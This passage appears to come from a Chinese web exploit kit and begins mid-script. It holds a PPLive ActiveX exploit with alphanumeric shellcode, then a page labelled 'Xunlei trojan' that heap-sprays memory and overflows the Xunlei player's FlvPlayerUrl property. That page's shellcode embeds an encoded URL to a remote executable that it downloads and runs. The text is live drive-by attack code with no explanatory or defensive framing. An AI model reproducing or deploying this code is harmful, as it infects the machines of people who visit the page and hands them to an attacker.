}

var pplivecode="";
pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";
pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";
pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";
pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";
pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";
pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSXQqsXTnRK3T2IWBwCTne3pnTo1eppt00aPoFNPeT8Quopwp";
realzh=reading+pao2+pplivecode;
temp=0x8000; while(realzh["length"] < temp) realzh+="hohoho";
var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];
Realpao["import"](arr1[Math.floor(Math["random"]()*6)], realzh, "", 0, 0);
}
RealExploit();
</script>

xl.htm  迅雷马

<html>
<object id="Silent" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>
<body>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>

<SCRIPT language="JavaScript">
var xlkk0 = "%u6870%u7474%u3a70%u2f2f%u6168%u2e68%u646b%u3269%u2e33%u6e63%u752f%u7070%u6f61%u652e%u6578"
</SCRIPT>

<SCRIPT language="JavaScript">
var shellcode = unescape("%u4343"+"%u4343"+"%u4343" +
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" +
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" +
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" +
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" +
xlkk0 );
</SCRIPT>

<SCRIPT language="JavaScript">
var helloworld2Address = 0x0c0c0c0c;
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0D0D%u0D0D");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
    spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2/1);
return spraySlide;
}

var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
Silent.FlvPlayerUrl = x;
</SCRIPT>

</boyd></html>


 
 
 
 
   
 
   
     